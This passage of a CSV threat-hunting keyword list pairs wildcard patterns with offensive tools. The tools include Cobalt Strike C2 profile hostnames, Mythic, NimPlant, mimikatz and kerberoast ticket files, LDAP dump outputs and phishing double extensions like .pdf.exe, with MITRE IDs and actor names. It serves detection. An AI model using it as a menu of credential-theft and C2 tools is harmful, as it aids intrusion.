APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.forums.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.ftp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*.go.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.groups.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.help.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.imap.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.img.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.kb.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.kerberoast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*.ldapdump.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.lists.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.live.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.local.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*.m.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.media.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mobile.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mysql.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.news.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.pdf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.photos.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 